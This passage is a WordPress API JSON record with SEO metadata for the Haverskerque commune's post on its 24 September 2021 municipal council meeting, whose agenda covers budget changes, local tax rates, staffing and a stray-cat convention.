href=\"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 24 Septembre 2021 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 juin 2021.&nbsp;Informations au Conseil Municipal INSTITUTION 1. Proc\u00e8s-verbal d\u2019installation d\u2019un nouveau conseiller municipal suite \u00e0 d\u00e9mission. INTERCOMMUNALIT\u00c9 2. A\u00e9rodrome de Merville-Calonne &#8211; Transfert de comp\u00e9tence de l\u2019exploitation et de la propri\u00e9t\u00e9 de l\u2019a\u00e9rodrome.3. Dispositifs culturels de la CCFL &#8211; Adh\u00e9sion de principe de la commune pour la dur\u00e9e du mandat. FINANCES 4. Budget principal de la ville 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b02.5. Modification des tarifs 2021 &#8211; Suppression de la majoration du service de garderie.6. Don au CCAS de Merville &#8211; Dons de mat\u00e9riel.7. Fonds de concours CCFL 2021 &#8211; Sollicitation au titre des d\u00e9penses d\u2019investissements.8. Spectacles \u00e0 1\u20ac 2021 &#8211; Prise en charge communale des d\u00e9penses.9. Taxe fonci\u00e8re sur les propri\u00e9t\u00e9s b\u00e2ties &#8211; Fixation du taux d\u2019exon\u00e9ration \u00e0 40%.10. Taxe d\u2019am\u00e9nagement &#8211; Fixation du taux \u00e0 1% pour l\u2019ann\u00e9e 2021. URBANISME 11. Acquisition par r\u00e9trocession \u00e0 l\u2019euro symbolique &#8211; Voiries cadastr\u00e9es A1877 et A1835. ADMINISTRATION G\u00c9N\u00c9RALE 12. R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire &#8211; Modification au 1er octobre 2021.13. Pr\u00e9vention des chats errants &#8211; Autorisation de signature de la convention avec l\u2019association Chatvabien. RESSOURCES HUMAINES 14. Remplacement d\u2019agent public momentan\u00e9ment indisponible.15. Activit\u00e9s extrascolaires &#8211; Ateliers danse &#8211; Nomination et r\u00e9mun\u00e9ration.16. Activit\u00e9s sportives et musicales en milieu scolaire &#8211; Nomination et r\u00e9mun\u00e9ration.17. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er octobre 2021.18. Action sociale du personnel &#8211; D\u00e9signation du.de la d\u00e9l\u00e9gu\u00e9.e \u00e9lu.e de la commune aupr\u00e8s du Comit\u00e9 National d\u2019Action Sociale (CNAS) \u00e0 compter du 1er janvier 2021.19. Attribution de ch\u00e8ques Cadhoc pour le personnel communal en 2021. Vous pouvez retrouver ci-dessous en PDF l\u2019ordre du jour de cette s\u00e9ance, son proc\u00e8s-verbal ainsi que l\u2019int\u00e9gralit\u00e9 des d\u00e9lib\u00e9rations prises\u00a0:\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-25T14:49:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:57+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 24 Septembre 2021\",\"datePublished\":\"2021-09-25T14:49:00+00:00\",\"dateModified\":\"2024-07-29T04:38:57+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/\"},\"wordCount\":330,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/\",\"name\":\"Conseil Municipal du 24 Septembre 2021 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2021-09-25T14:49:00+00:00\",\"dateModified\":\"2024-07-29T04:38:57+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2021\\\/09\\\/25\\\/conseil-municipal-du-24-septembre-2021\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 24 Septembre 2021\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 24 Septembre 2021 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 24 Septembre 2021 * Haverskerque, 100% Nature !*","og_description":"ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 juin 2021.&nbsp;Informations au Conseil Municipal INSTITUTION 1. Proc\u00e8s-verbal d\u2019installation d\u2019un nouveau conseiller municipal suite \u00e0 d\u00e9mission. INTERCOMMUNALIT\u00c9 2. A\u00e9rodrome de Merville-Calonne &#8211; Transfert de comp\u00e9tence de l\u2019exploitation et de la propri\u00e9t\u00e9 de l\u2019a\u00e9rodrome.3. Dispositifs culturels de la CCFL &#8211; Adh\u00e9sion de principe de la commune pour la dur\u00e9e du mandat. FINANCES 4. Budget principal de la ville 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b02.5. Modification des tarifs 2021 &#8211; Suppression de la majoration du service de garderie.6. Don au CCAS de Merville &#8211; Dons de mat\u00e9riel.7. Fonds de concours CCFL 2021 &#8211; Sollicitation au titre des d\u00e9penses d\u2019investissements.8. Spectacles \u00e0 1\u20ac 2021 &#8211; Prise en charge communale des d\u00e9penses.9. Taxe fonci\u00e8re sur les propri\u00e9t\u00e9s b\u00e2ties &#8211; Fixation du taux d\u2019exon\u00e9ration \u00e0 40%.10. Taxe d\u2019am\u00e9nagement &#8211; Fixation du taux \u00e0 1% pour l\u2019ann\u00e9e 2021. URBANISME 11. Acquisition par r\u00e9trocession \u00e0 l\u2019euro symbolique &#8211; Voiries cadastr\u00e9es A1877 et A1835. ADMINISTRATION G\u00c9N\u00c9RALE 12. R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire &#8211; Modification au 1er octobre 2021.13. Pr\u00e9vention des chats errants &#8211; Autorisation de signature de la convention avec l\u2019association Chatvabien. RESSOURCES HUMAINES 14. Remplacement d\u2019agent public momentan\u00e9ment indisponible.15. Activit\u00e9s extrascolaires &#8211; Ateliers danse &#8211; Nomination et r\u00e9mun\u00e9ration.16. Activit\u00e9s sportives et musicales en milieu scolaire &#8211; Nomination et r\u00e9mun\u00e9ration.17. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er octobre 2021.18. Action sociale du personnel &#8211; D\u00e9signation du.de la d\u00e9l\u00e9gu\u00e9.e \u00e9lu.e de la commune aupr\u00e8s du Comit\u00e9 National d\u2019Action Sociale (CNAS) \u00e0 compter du 1er janvier 2021.19. Attribution de ch\u00e8ques Cadhoc pour le personnel communal en 2021. Vous pouvez retrouver ci-dessous en PDF l\u2019ordre du jour de cette s\u00e9ance, son proc\u00e8s-verbal ainsi que l\u2019int\u00e9gralit\u00e9 des d\u00e9lib\u00e9rations prises\u00a0:","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2021-09-25T14:49:00+00:00","article_modified_time":"2024-07-29T04:38:57+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 24 Septembre 2021","datePublished":"2021-09-25T14:49:00+00:00","dateModified":"2024-07-29T04:38:57+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/"},"wordCount":330,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/","name":"Conseil Municipal du 24 Septembre 2021 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2021-09-25T14:49:00+00:00","dateModified":"2024-07-29T04:38:57+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 24 Septembre 2021"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=641"}],"version-history":[{"count":4,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions"}],"predecessor-version":[{"id":8304,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/641\/revisions\/8304"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}